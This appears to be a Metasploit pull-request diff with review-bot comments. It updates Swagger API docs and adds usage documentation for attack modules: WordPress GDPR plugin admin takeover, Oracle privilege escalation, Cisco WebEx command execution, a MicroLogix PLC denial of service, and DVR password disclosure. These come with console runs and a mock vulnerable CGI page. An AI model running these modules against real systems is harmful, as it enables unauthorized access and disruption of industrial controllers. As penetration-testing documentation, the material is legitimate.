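Review bot: `property :realm_key ... enum: PRIVATE_TYPE_ENUM` and `property :realm_value ... enum: PRIVATE_TYPE_ENUM` constrain the realm key and value to the list of private-credential class names, which is a copy-paste from the `private_type` line above; they should carry `example: KEY_EXAMPLE` and `example: VALUE_EXAMPLE` (the constants added earlier in this diff) and no enum. On the context line below, `property :port, type: :int32` is not a valid Swagger type; it should be `type: :integer, format: :int32` like the other integer fields.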
@ -312,7 +328,7 @@ module CredentialApiDoc
|
|||
|
||||
#Swagger documentation for /api/v1/credentials/:id PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing credential.'
|
||||
key :description, 'Update the attributes on an existing credential.'
|
||||
key :tags, [ 'credential' ]
|
||||
|
||||
parameter :update_id
|
||||
|
|
|
@ -10,7 +10,7 @@ module EventApiDoc
|
|||
SEEN_DESC = 'true if a user has acknowledged the event.'
|
||||
USERNAME_DESC = 'Name of the user that triggered the event.'
|
||||
INFO_DESC = 'Information about the event specific to the event name.'
|
||||
INFO_EXAMPLE = '{:command=>"irb"}'
|
||||
INFO_EXAMPLE = {command: 'irb'}
|
||||
|
||||
# Swagger documentation for Event model
|
||||
swagger_schema :Event do
|
||||
|
@ -27,6 +27,69 @@ module EventApiDoc
|
|||
end
|
||||
|
||||
swagger_path '/api/v1/events' do
|
||||
# Swagger documentation for /api/v1/events GET
|
||||
operation :get do
|
||||
key :description, 'Return events that are stored in the database.'
|
||||
key :tags, [ 'event' ]
|
||||
|
||||
parameter :workspace
|
||||
|
||||
parameter do
|
||||
key :name, :limit
|
||||
key :in, :query
|
||||
key :description, RootApiDoc::LIMIT_DESC
|
||||
key :example, RootApiDoc::LIMIT_DEFAULT
|
||||
key :type, :integer
|
||||
key :format, :int32
|
||||
key :required, false
|
||||
end
|
||||
|
||||
parameter do
|
||||
key :name, :offset
|
||||
key :in, :query
|
||||
key :description, RootApiDoc::OFFSET_DESC
|
||||
key :example, RootApiDoc::OFFSET_DEFAULT
|
||||
key :type, :integer
|
||||
key :format, :int32
|
||||
key :required, false
|
||||
end
|
||||
|
||||
parameter do
|
||||
key :name, :order
|
||||
key :in, :query
|
||||
key :description, RootApiDoc::ORDER_DESC
|
||||
key :type, :string
|
||||
key :required, false
|
||||
key :enum, RootApiDoc::ORDER_ENUM
|
||||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Returns event data.'
|
||||
schema do
|
||||
property :data do
|
||||
key :type, :array
|
||||
items do
|
||||
key :'$ref', :Event
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Swagger documentation for /api/v1/events POST
|
||||
operation :post do
|
||||
key :description, 'Create an event.'
|
||||
|
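Review bot: the `limit`, `offset` and `order` parameter blocks are reproduced verbatim in the session-events hunk further down this diff; since the file already uses a shared `parameter :workspace`, define `:limit`, `:offset` and `:order` once alongside the `RootApiDoc::LIMIT_DEFAULT`/`OFFSET_DEFAULT`/`ORDER_ENUM` constants and reference them the same way, so there is one place to change the defaults.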
@ -71,4 +134,44 @@ module EventApiDoc
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
swagger_path '/api/v1/events/{id}' do
|
||||
# Swagger documentation for /api/v1/events/:id GET
|
||||
operation :get do
|
||||
key :description, 'Return a specific event that is stored in the database.'
|
||||
key :tags, [ 'event' ]
|
||||
|
||||
parameter do
|
||||
key :name, :id
|
||||
key :in, :path
|
||||
key :description, 'ID of event to retrieve.'
|
||||
key :required, true
|
||||
key :type, :integer
|
||||
key :format, :int32
|
||||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Returns event data.'
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Event
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
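Review bot: the per-id `GET` documents 200, 401 and 500 but not the response for an id that does not exist; if the controller returns 404 (or 200 with an empty `data`), document it so clients can tell "no such event" apart from an auth or server failure. The `id` parameter block is also the same as the one in the session-events `{id}` hunk below and could become a shared `parameter :id`.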
@ -266,7 +266,7 @@ module HostApiDoc
|
|||
|
||||
# Swagger documentation for /api/v1/hosts/:id PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing host.'
|
||||
key :description, 'Update the attributes on an existing host.'
|
||||
key :tags, [ 'host' ]
|
||||
|
||||
parameter :update_id
|
||||
|
|
|
@ -153,7 +153,7 @@ module LoginApiDoc
|
|||
end
|
||||
|
||||
swagger_path '/api/v1/logins/{id}' do
|
||||
# Swagger documentation for api/v1/logins/:id GET
|
||||
# Swagger documentation for /api/v1/logins/:id GET
|
||||
operation :get do
|
||||
key :description, 'Return specific login that is stored in the database.'
|
||||
key :tags, [ 'login' ]
|
||||
|
@ -193,7 +193,7 @@ module LoginApiDoc
|
|||
|
||||
# Swagger documentation for /api/v1/logins/:id PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing login.'
|
||||
key :description, 'Update the attributes on an existing login.'
|
||||
key :tags, [ 'login' ]
|
||||
|
||||
parameter :update_id
|
||||
|
|
|
@ -10,7 +10,8 @@ module LootApiDoc
|
|||
LTYPE_EXAMPLE = "'file', 'image', 'config_file', etc."
|
||||
PATH_DESC = 'The on-disk path to the loot file.'
|
||||
PATH_EXAMPLE = '/path/to/file.txt'
|
||||
DATA_DESC = 'The contents of the file.'
|
||||
DATA_DESC = "Base64 encoded copy of the file's contents."
|
||||
DATA_EXAMPLE = 'dGhpcyBpcyB0aGUgZmlsZSdzIGNvbnRlbnRz'
|
||||
CONTENT_TYPE_DESC = 'The mime/content type of the file at {#path}. Used to server the file correctly so browsers understand whether to render or download the file.'
|
||||
CONTENT_TYPE_EXAMPLE = 'text/plain'
|
||||
NAME_DESC = 'The name of the loot.'
|
||||
|
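Review bot: `CONTENT_TYPE_DESC` on the context line still reads "Used to server the file correctly"; since this hunk touches the neighbouring constants, fix the typo to "serve". The new `DATA_DESC` says the value is Base64 encoded; say whether the API also returns it Base64 encoded on GET, because the create body further down reuses the same `DATA_DESC` and readers will assume both directions behave the same.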
@ -18,6 +19,9 @@ module LootApiDoc
|
|||
INFO_DESC = 'Information about the loot.'
|
||||
MODULE_RUN_ID_DESC = 'The ID of the module run record this loot is associated with.'
|
||||
|
||||
# Some of the attributes expect different data when doing a create.
|
||||
CREATE_PATH_DESC = 'The name to give the file on the server. All files are stored in a server configured path, so a full path is not needed. If there is a corresponding file on disk, the given value will be prepended with a unique string to prevent accidental overwrites of other files.'
|
||||
CREATE_PATH_EXAMPLE = 'password_file.txt'
|
||||
|
||||
# Swagger documentation for loot model
|
||||
swagger_schema :Loot do
|
||||
|
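Review bot: `CREATE_PATH_DESC` promises that files land in a server-configured directory but does not say what happens to directory separators or `..` components in the supplied name; document that the value is reduced to a basename (or rejected when it contains path components), since this is the field a client controls and this description is what implementers read when deciding what to validate.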
@ -28,7 +32,7 @@ module LootApiDoc
|
|||
property :service_id, type: :integer, format: :int32, description: SERVICE_ID_DESC
|
||||
property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE
|
||||
property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE
|
||||
property :data, type: :string, description: DATA_DESC
|
||||
property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
|
||||
property :content_type, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
|
||||
property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE
|
||||
property :info, type: :string, description: INFO_DESC
|
||||
|
@ -87,8 +91,8 @@ module LootApiDoc
|
|||
property :host, type: :string, format: :ipv4, description: HOST_DESC, example: RootApiDoc::HOST_EXAMPLE
|
||||
property :service, '$ref': :Service
|
||||
property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
|
||||
property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE, required: true
|
||||
property :data, type: :string, description: DATA_DESC
|
||||
property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
|
||||
property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
|
||||
property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
|
||||
property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
|
||||
property :info, type: :string, description: INFO_DESC
|
||||
|
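Review bot: the create body exposes the MIME type as `ctype` while the `Loot` schema above exposes it as `content_type`; if the endpoint genuinely reads `ctype`, say so in `CONTENT_TYPE_DESC` (or note the rename there), otherwise align the two names so a client can round-trip a GET response into a POST body.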
@ -195,7 +199,7 @@ module LootApiDoc
|
|||
|
||||
# Swagger documentation for /api/v1/loots/{id} PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing loot.'
|
||||
key :description, 'Update the attributes on an existing loot.'
|
||||
key :tags, [ 'loot' ]
|
||||
|
||||
parameter :update_id
|
||||
|
@ -206,7 +210,14 @@ module LootApiDoc
|
|||
key :description, 'The updated attributes to overwrite to the loot.'
|
||||
key :required, true
|
||||
schema do
|
||||
key :'$ref', :Loot
|
||||
property :workspace, type: :string, required: true, description: RootApiDoc::WORKSPACE_POST_DESC, example: RootApiDoc::WORKSPACE_POST_EXAMPLE
|
||||
property :host_id, type: :integer, format: :int32, description: HOST_ID_DESC
|
||||
property :service_id, type: :integer, format: :int32, description: SERVICE_ID_DESC
|
||||
property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
|
||||
property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
|
||||
property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
|
||||
property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
|
||||
property :info, type: :string, description: INFO_DESC
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
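Review bot: replacing `key :'$ref', :Loot` with an explicit property list drops `data` from the update body, so a client can no longer change the stored file contents via PUT; if that is intended (metadata-only updates), state it in the operation description, otherwise add `property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE` back.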
@ -184,7 +184,7 @@ module NoteApiDoc
|
|||
|
||||
# Swagger documentation for /api/v1/notes/:id PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing note.'
|
||||
key :description, 'Update the attributes on an existing note.'
|
||||
key :tags, [ 'note' ]
|
||||
|
||||
parameter :update_id
|
||||
|
|
|
@ -17,6 +17,15 @@ module RootApiDoc
|
|||
AUTH_CODE_DESC = 'The authentication error code that was generated.'
|
||||
AUTH_CODE_EXAMPLE = 401
|
||||
AUTH_MESSAGE_DESC = 'A message describing the authentication error that occurred.'
|
||||
LIMIT_DEFAULT = 100
|
||||
LIMIT_DESC = "The maximum number of results that will be retrieved from the query. (Default: #{LIMIT_DEFAULT})"
|
||||
OFFSET_DEFAULT = 0
|
||||
OFFSET_DESC = "The number of results the query will begin reading from the beginning of the set. (Default: #{OFFSET_DEFAULT})"
|
||||
ORDER_DESC = 'The order in which results are returned, based on the created_at datetime. (Default: desc)'
|
||||
ORDER_ENUM = [
|
||||
'asc',
|
||||
'desc'
|
||||
]
|
||||
|
||||
DEFAULT_RESPONSE_200 = 'Successful operation.'
|
||||
DEFAULT_RESPONSE_401 = 'Authenticate to access this resource.'
|
||||
|
|
|
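Review bot: `LIMIT_DESC` gives the default but no maximum, so clients will assume `limit` is unbounded; if the API caps it, document the cap, and if it does not, a ceiling is worth adding before these parameters are wired into every list endpoint, because an unbounded `limit` on `/api/v1/credentials` or `/api/v1/loots` pulls an entire workspace in one request. `OFFSET_DESC` ("The number of results the query will begin reading from the beginning of the set") is also awkward; "Number of results to skip before the first one returned" is clearer.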
@ -187,7 +187,7 @@ module ServiceApiDoc
|
|||
|
||||
# Swagger documentation for /api/v1/services/:id PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing service.'
|
||||
key :description, 'Update the attributes on an existing service.'
|
||||
key :tags, [ 'service' ]
|
||||
|
||||
parameter :update_id
|
||||
|
|
|
@ -86,7 +86,7 @@ module SessionApiDoc
|
|||
end
|
||||
|
||||
swagger_path '/api/v1/sessions/{id}' do
|
||||
# Swagger documentation for api/v1/sessions/:id GET
|
||||
# Swagger documentation for /api/v1/sessions/:id GET
|
||||
operation :get do
|
||||
key :description, 'Return a specific session that is stored in the database.'
|
||||
key :tags, [ 'session' ]
|
||||
|
|
|
@ -32,6 +32,35 @@ module SessionEventApiDoc
|
|||
key :description, 'Return session events that are stored in the database.'
|
||||
key :tags, [ 'session_event' ]
|
||||
|
||||
parameter do
|
||||
key :name, :limit
|
||||
key :in, :query
|
||||
key :description, RootApiDoc::LIMIT_DESC
|
||||
key :example, RootApiDoc::LIMIT_DEFAULT
|
||||
key :type, :integer
|
||||
key :format, :int32
|
||||
key :required, false
|
||||
end
|
||||
|
||||
parameter do
|
||||
key :name, :offset
|
||||
key :in, :query
|
||||
key :description, RootApiDoc::OFFSET_DESC
|
||||
key :example, RootApiDoc::OFFSET_DEFAULT
|
||||
key :type, :integer
|
||||
key :format, :int32
|
||||
key :required, false
|
||||
end
|
||||
|
||||
parameter do
|
||||
key :name, :order
|
||||
key :in, :query
|
||||
key :description, RootApiDoc::ORDER_DESC
|
||||
key :type, :string
|
||||
key :required, false
|
||||
key :enum, RootApiDoc::ORDER_ENUM
|
||||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Returns session event data.'
|
||||
schema do
|
||||
|
@ -59,7 +88,7 @@ module SessionEventApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
# Swagger documentation for /api/v1/session events POST
|
||||
# Swagger documentation for /api/v1/session-events POST
|
||||
operation :post do
|
||||
key :description, 'Create a session events entry.'
|
||||
key :tags, [ 'session_event' ]
|
||||
|
@ -105,15 +134,15 @@ module SessionEventApiDoc
|
|||
end
|
||||
|
||||
swagger_path '/api/v1/session-events/{id}' do
|
||||
# Swagger documentation for api/v1/session-events/:id GET
|
||||
# Swagger documentation for /api/v1/session-events/:id GET
|
||||
operation :get do
|
||||
key :description, 'Return a specific session_event that is stored in the database.'
|
||||
key :description, 'Return a specific session event that is stored in the database.'
|
||||
key :tags, [ 'session_event' ]
|
||||
|
||||
parameter do
|
||||
key :name, :id
|
||||
key :in, :path
|
||||
key :description, 'ID of session_event to retrieve.'
|
||||
key :description, 'ID of session event to retrieve.'
|
||||
key :required, true
|
||||
key :type, :integer
|
||||
key :format, :int32
|
||||
|
|
|
@ -15,10 +15,9 @@ module VulnApiDoc
|
|||
ORIGIN_ID_DESC = 'ID of the associated origin record.'
|
||||
ORIGIN_TYPE_DESC = 'The origin type of this vuln.'
|
||||
REFS_DESC = 'An array of public reference IDs for this vuln.'
|
||||
REF_ID_DESC = 'The ID of the related Mdm::ModuleRef or Mdm::VulnRef associated with this vuln.'
|
||||
REF_ID_DESC = 'The ID of the related Mdm::Ref associated with this vuln.'
|
||||
REF_NAME_DESC = 'Designation for external reference. May include a prefix for the authority, such as \'CVE-\', in which case the rest of the name is the designation assigned by that authority.'
|
||||
REFS_EXAMPLE = ['CVE-2008-4250','OSVDB-49243','MSB-MS08-067']
|
||||
MODULE_REF_DETAIL_ID_DESC = 'The ID of the Mdm::Module::Detail record this ModuleRef is associated with.'
|
||||
|
||||
# Swagger documentation for vulns model
|
||||
swagger_schema :Vuln do
|
||||
|
@ -32,24 +31,12 @@ module VulnApiDoc
|
|||
property :vuln_attempt_count, type: :integer, format: :int32, description: VULN_ATTEMPT_COUNT
|
||||
property :origin_id, type: :integer, format: :int32, description: ORIGIN_ID_DESC
|
||||
property :origin_type, type: :string, description: ORIGIN_TYPE_DESC
|
||||
property :vuln_refs do
|
||||
key :type, :array
|
||||
items do
|
||||
key :'$ref', :VulnRef
|
||||
end
|
||||
end
|
||||
property :refs do
|
||||
key :type, :array
|
||||
items do
|
||||
key :'$ref', :Ref
|
||||
end
|
||||
end
|
||||
property :module_refs do
|
||||
key :type, :array
|
||||
items do
|
||||
key :'$ref', :ModuleRef
|
||||
end
|
||||
end
|
||||
property :created_at, type: :string, format: :date_time, description: RootApiDoc::CREATED_AT_DESC
|
||||
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
|
||||
end
|
||||
|
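Review bot: `property :refs` now points at `key :'$ref', :Ref`, but no `swagger_schema :Ref` appears in this diff while the `:ModuleRef` and `:VulnRef` schemas it replaces are deleted in the next hunk; make sure `:Ref` is defined (presumably carrying the retained `REF_NAME_DESC`), otherwise the generated spec contains a dangling reference.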
@ -63,21 +50,6 @@ module VulnApiDoc
|
|||
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
|
||||
end
|
||||
|
||||
swagger_schema :ModuleRef do
|
||||
key :required, [:name]
|
||||
property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
|
||||
property :detail_id, type: :integer, format: :int32, description: MODULE_REF_DETAIL_ID_DESC
|
||||
property :name, type: :string, required: true, description: REF_NAME_DESC
|
||||
end
|
||||
|
||||
swagger_schema :VulnRef do
|
||||
key :required, [:ref_id, :vuln_id]
|
||||
property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
|
||||
property :ref_id, type: :integer, format: :int32, description: RootApiDoc::CREATED_AT_DESC
|
||||
property :vuln_id, type: :integer, format: :int32, description: RootApiDoc::UPDATED_AT_DESC
|
||||
end
|
||||
|
||||
|
||||
swagger_path '/api/v1/vulns' do
|
||||
# Swagger documentation for /api/v1/vulns GET
|
||||
operation :get do
|
||||
|
@ -239,7 +211,7 @@ module VulnApiDoc
|
|||
|
||||
# Swagger documentation for /api/v1/vulns/:id PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing vuln.'
|
||||
key :description, 'Update the attributes on an existing vuln.'
|
||||
key :tags, [ 'vuln' ]
|
||||
|
||||
parameter :update_id
|
||||
|
|
|
@ -173,7 +173,7 @@ module WorkspaceApiDoc
|
|||
|
||||
# Swagger documentation for /api/v1/workspaces/:id PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing workspaces.'
|
||||
key :description, 'Update the attributes on an existing workspace.'
|
||||
key :tags, [ 'workspace' ]
|
||||
|
||||
parameter :update_id
|
||||
|
|
|
@ -0,0 +1,48 @@
|
|||
## Description
|
||||
|
||||
This module exploits the [Wordpress GDPR compliance plugin](https://wordpress.org/plugins/wp-gdpr-compliance/) lack of validation ([WPVDB 9144](https://wpvulndb.com/vulnerabilities/9144)), which affects versions 1.4.2 and lower.
|
||||
|
||||
When a user triggers GDPR-related actions, Wordpress's `admin-ajax.php` is called but fails to do validation and capacity checks regarding the asked actions. This leads to any unauthenticated user being able to modify any arbitrary settings on the targeted server.
|
||||
|
||||
This module changes the admin email (optional) to prevent notification sending, enables new user registration, changes the default role of new users to Administrator, and registers a new user that can be used for authentication. The attacker can then log in and take any actions on the newly compromised site.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[GDPR Compliance plugin <= 1.4.2](https://downloads.wordpress.org/plugin/wp-gdpr-compliance.1.4.2.zip)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. `./msfconsole`
|
||||
3. `use auxiliary/admin/http/wp_gdpr_compliance_privesc`
|
||||
4. `set RHOST [wp host]`
|
||||
5. `set RPORT [wp port]`
|
||||
6. `set EMAIL [email address]`
|
||||
7. `run`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Debian 9.6 running Wordpress 4.7.5 with WordPress GDPR Compliance plugin 1.4.2:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/admin/http/wp_gdpr_compliance_privesc
|
||||
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set verbose true
|
||||
verbose => true
|
||||
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set rhosts 172.22.222.145
|
||||
rhosts => 172.22.222.145
|
||||
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set email test@example.com
|
||||
email => test@example.com
|
||||
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > check
|
||||
|
||||
[*] Checking /wp-content/plugins/wp-gdpr-compliance/readme.txt
|
||||
[*] Found version 1.4.2 of the plugin
|
||||
[*] 172.22.222.145:80 The target appears to be vulnerable.
|
||||
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > exploit
|
||||
|
||||
[*] Getting security token from host...
|
||||
[!] Enabling user registrations...
|
||||
[!] Setting the default user role type to administrator...
|
||||
[*] Registering msfuser with email test@example.com
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) >
|
||||
```
|
|
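Review bot: step 4 of the verification steps says `set RHOST [wp host]` while the scenario uses `set rhosts`; make the step `set RHOSTS [wp host]` so it matches. In the description, "capacity checks" should be "capability checks" (WordPress capabilities are what the plugin fails to verify), and "Wordpress" should be "WordPress" throughout. The scenario also never shows the optional admin-email change the description mentions; either show the option in the scenario or list it under an Options heading.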
@ -0,0 +1,28 @@
|
|||
## Vulnerable Application
|
||||
|
||||
1. [Install Oracle Database](http://www.oracle.com/technetwork/indexes/downloads/index.html#database)
|
||||
2. [Insert the "Scott/Tiger" test data](http://www.orafaq.com/wiki/SCOTT)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Connect via sqlplus, and check current privileges:
|
||||
1. Ex: `sqlplus SCOTT/TIGER@192.168.3.100:1521/XEXDB`
|
||||
2. Ex: `SELECT * FROM session_privs`
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/admin/oracle/oracle_index_privesc```
|
||||
4. Do: set ```SQL```, and ```TABLE``` if desired
|
||||
5. Do: ```exploit```
|
||||
6. Reconnect with sqlplus and check privileges post-exploit:
|
||||
1. Ex: `sqlplus SCOTT/TIGER@192.168.3.100:1521/XEXDB`
|
||||
2. Ex: `SELECT * FROM session_privs`
|
||||
|
||||
## Options
|
||||
|
||||
**SQL**
|
||||
|
||||
The SQL that will execute with the privileges of the user who created the index. Default is to escalate privileges.
|
||||
|
||||
**TABLE**
|
||||
|
||||
Table to create the index on.
|
|
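Review bot: the verification steps are numbered 1, 2, 2, 3, ..., so the second `2.` (Start msfconsole) and everything after it need renumbering. Both `SELECT * FROM session_privs` examples need a trailing `;` to execute in sqlplus, and the triple-backtick inline code (```use auxiliary/admin/oracle/oracle_index_privesc```) renders as a fence in some Markdown renderers; use single backticks as the other docs in this diff do. The `SQL` option text ("Default is to escalate privileges") would be more useful if it showed the default statement.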
@ -0,0 +1,47 @@
|
|||
## Description
|
||||
|
||||
This module exploits a remote code execution vulnerability in Cisco's WebEx client software versions < v33.6.0.655
|
||||
By supplying valid login credentials to the target machine, a single command can be executed with System privileges.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Cisco WebEx Client v33.3.8.7 and below
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/admin/smb/webexec_command```
|
||||
4. Do: ```set RHOSTS <IP>```
|
||||
5. Do: ```set SMBUser <USERNAME>```
|
||||
6. Do: ```set SMBPass <PASSWORD>```
|
||||
7. Do: ```run```
|
||||
8. You should get output that verifies the execution of the command
|
||||
|
||||
## Options
|
||||
|
||||
**FORCE_GUI**
|
||||
|
||||
Uses WMIC to create a GUI
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/admin/smb/webexec_command
|
||||
msf5 auxiliary(admin/smb/webexec_command) > set rhosts 192.168.37.136
|
||||
rhosts => 192.168.37.136
|
||||
msf5 auxiliary(admin/smb/webexec_command) > set smbuser a_user
|
||||
smbuser => a_user
|
||||
msf5 auxiliary(admin/smb/webexec_command) > set smbpass password
|
||||
smbpass => password
|
||||
msf5 auxiliary(admin/smb/webexec_command) > run
|
||||
|
||||
[+] 192.168.37.136:445 - Command completed!
|
||||
[*] 192.168.37.136:445 - Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(admin/smb/webexec_command) >
|
||||
```
|
|
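Review bot: the description says the vulnerability affects versions "< v33.6.0.655" while "Vulnerable Application" says "v33.3.8.7 and below"; pick one, citing the vendor advisory, so readers know which builds are affected. "Example steps in this format (is also in the PR):" is leftover template text and should be removed. The description says "a single command can be executed with System privileges" but the option that carries that command is not listed under Options next to `FORCE_GUI`; add it.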
@ -0,0 +1,36 @@
|
|||
## Vulnerable Application
|
||||
|
||||
A remote, unauthenticated attacker could send a single, specially crafted Programmable Controller Communication Commands (PCCC) packet to the controller that could potentially cause the controller to enter a DoS condition.
|
||||
MicroLogix 1100 controllers are affected: 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, and 1763-L16DWD.
|
||||
CVE-2017-7924 has been assigned to this vulnerability.
|
||||
A CVSS v3 base score of 7.5 has been assigned.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: `use auxiliary/dos/scada/allen_bradley_pccc`
|
||||
2. Do: `set RHOST=IP` where IP is the IP address of the target
|
||||
3. Do: `check` verify if target is vulnerable
|
||||
4. Do: `exploit` send DoS packet
|
||||
|
||||
## Options
|
||||
|
||||
1. PORT: `set RPORT=44818`
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use auxiliary/dos/scada/allen_bradley_pccc
|
||||
msf auxiliary(dos/scada/allen_bradley_pccc) > set RHOST 172.27.248.194
|
||||
RHOST => 172.27.248.194
|
||||
msf auxiliary(dos/scada/allen_bradley_pccc) > check
|
||||
|
||||
[*] 172.27.248.194:44818 - Product Name: 1763-L16BWA B/14.00
|
||||
[+] 172.27.248.194:44818 - The target is vulnerable.
|
||||
msf auxiliary(dos/scada/allen_bradley_pccc) > exploit
|
||||
|
||||
[*] 172.27.248.194:44818 - Ethernet/IP - Session created (id 0xaf79a666)
|
||||
[*] 172.27.248.194:44818 - CIP Connection Manager - Forward Open Success (Connection id 0x66a66e85)
|
||||
[*] 172.27.248.194:44818 - Sending PCCC DoS magic packet...
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
|
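Review bot: `set RHOST=IP` and `set RPORT=44818` use `NAME=VALUE` syntax, which msfconsole's `set` does not take (it expects a space-separated name and value); write them as `set RHOST <IP>` and `set RPORT 44818`, matching the scenario's `set RHOST 172.27.248.194`. The scenario ends at "Sending PCCC DoS magic packet..." with no indication of how the DoS was confirmed; a line on what to observe on the controller afterwards (fault state, lost connectivity) would make the verification repeatable.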
@ -0,0 +1,76 @@
|
|||
## Description
|
||||
|
||||
C2S DVR allows an unauthenticated user to disclose the username
|
||||
& password by requesting the javascript page 'read.cgi?page=2'.
|
||||
This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
This module has been verified against the mock vulnerable page listed below.
|
||||
|
||||
### Mock Vulnerable Page
|
||||
|
||||
These instructions will create a cgi environment and a vulnerable perl application for exploitation.
|
||||
Kali rolling (2019.1) was utilized for this tutorial, with apache.
|
||||
|
||||
#### Setup
|
||||
|
||||
1. Enable cgi: `a2enmod cgid`
|
||||
2. `mkdir /var/www/html/cgi-bin`
|
||||
3. Enable folder for cgi execution: add `ScriptAlias "/cgi-bin/" "/var/www/html/cgi-bin/"` to `/etc/apache2/sites-enabled/000-default.conf ` inside of the `VirtualHost` tags
|
||||
4. Create the vulnerable page by writing the following text to `/var/www/html/cgi-bin/read.cgi`:
|
||||
|
||||
```
|
||||
#!/usr/bin/perl
|
||||
use CGI qw(:standard);
|
||||
$query = new CGI;
|
||||
print $query->header( -type=> "text/javascript"),
|
||||
$query->import_names( 'Q' );
|
||||
|
||||
my $data = <<'DATA';
|
||||
var pw_enflag = "1";
|
||||
var pw_adminpw = "12345";
|
||||
var pw_retype1 = "12345";
|
||||
var pw_userpw = "56789";
|
||||
var pw_retype2 = "56789";
|
||||
var pw_autolock = "0";
|
||||
DATA
|
||||
|
||||
if ($Q::page == 2) {
|
||||
print $data;
|
||||
}
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. ```use auxiliary/gather/c2s_dvr_password_disclosure```
|
||||
3. ```set rhosts [rhosts]```
|
||||
4. ```run```
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Against the Mock page listed above
|
||||
|
||||
```
|
||||
resource (c2s.rb)> use auxiliary/gather/c2s_dvr_password_disclosure
|
||||
resource (c2s.rb)> set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
resource (c2s.rb)> set verbose true
|
||||
verbose => true
|
||||
resource (c2s.rb)> exploit
|
||||
[*] Attempting to load data from /cgi-bin/read.cgi?page=2
|
||||
[+] Found: admin:12345
|
||||
[+] Found: user:56789
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
